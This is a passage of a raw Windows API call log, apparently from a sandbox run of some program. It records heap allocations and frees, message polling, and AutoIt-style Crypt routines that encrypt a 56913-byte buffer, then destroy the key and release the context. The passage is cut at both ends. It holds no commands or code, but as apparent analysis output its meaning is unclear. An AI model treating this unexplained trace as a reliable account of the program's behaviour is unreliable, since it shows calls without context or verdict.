[0173.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0173.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0173.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0173.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0173.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0173.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0173.180] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0173.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0173.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0173.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0173.180] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0173.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0173.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0173.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0173.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0173.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d4c0 [0173.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0173.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0173.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0173.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0173.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0173.180] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0173.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0173.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0173.180] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0173.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0173.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0173.181] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.181] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.181] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0173.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0173.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0173.181] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0173.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df050 [0173.181] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0173.181] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0173.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0173.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0173.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0173.181] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0173.181] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0173.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0173.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0173.181] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0173.181] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0173.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0173.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0173.181] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0173.181] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0173.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0173.181] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0173.181] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0173.182] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0173.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0173.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0173.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0173.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0173.182] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0xde49, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0xde50) returned 1 [0173.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0173.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0173.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0f0 [0173.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0173.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0173.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0173.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0173.182] CharLowerBuffW (in: lpsz="byte[56913]", cchLength=0xb | out: lpsz="byte[56913]") returned 0xb [0173.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0173.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0173.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0173.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0173.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0173.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0173.184] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0173.184] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0173.184] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x9d2fd8*, pdwDataLen=0x87e820*=0xde49, dwBufLen=0xde50 | out: pbData=0x9d2fd8*, pdwDataLen=0x87e820*=0xde50) returned 1 [0173.186] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0173.186] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0173.200] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0173.207] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0173.207] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0173.207] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0173.207] CryptDestroyKey (hKey=0x90af18) returned 1 [0173.208] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0173.208] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0173.208] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0173.208] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0173.208] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0173.208] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0173.208] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0173.208] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0173.208] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0173.208] CryptReleaseContext (hProv=0x9c0b78, dwFlags=0x0) returned 1 [0173.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0173.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0173.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0173.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0173.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0173.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0173.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0173.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0173.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0173.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0173.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0173.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0173.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0173.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0173.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0173.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0173.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0173.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0173.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0173.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0173.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0173.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0173.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0173.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0173.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0173.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0173.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0173.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0173.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0173.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0173.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0173.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0173.209] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0173.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0173.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0173.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0173.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0173.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0173.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0173.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0173.209] FreeLibrary (hLibModule=0x74f20000) returned 1 [0173.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0173.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0173.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0173.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0173.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0173.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0173.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0173.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0173.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0173.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0173.210] CloseHandle (hObject=0x138) returned 1 [0173.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0173.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0173.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa5f008 | out: hHeap=0x8a0000) returned 1 [0173.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae58 | out: hHeap=0x8a0000) returned 1 [0173.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0173.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0173.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0173.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0173.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0173.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0173.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0173.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0173.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0173.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0173.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0173.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0173.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0173.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0173.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0173.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0173.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0173.211] CloseHandle (hObject=0x120) returned 1 [0173.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0173.214] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0173.214] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa6f010 | out: hHeap=0x8a0000) returned 1 [0173.214] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0173.214] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0173.214] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0173.214] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0173.214] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0173.214] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0173.214] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0173.214] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0173.214] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0173.215] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0173.215] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0173.215] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0173.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0173.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0173.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0173.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0173.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0173.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0173.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0173.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0173.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0173.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0173.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0173.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0173.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0173.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0173.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa7f018 | out: hHeap=0x8a0000) returned 1 [0173.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0173.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0173.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0173.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0173.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0173.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0173.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0173.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0173.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0173.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0173.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0173.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0173.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0173.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0173.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0173.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0173.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0173.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0173.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0173.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0173.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0173.217] HeapFree (in: hHeap=0x8a0000, 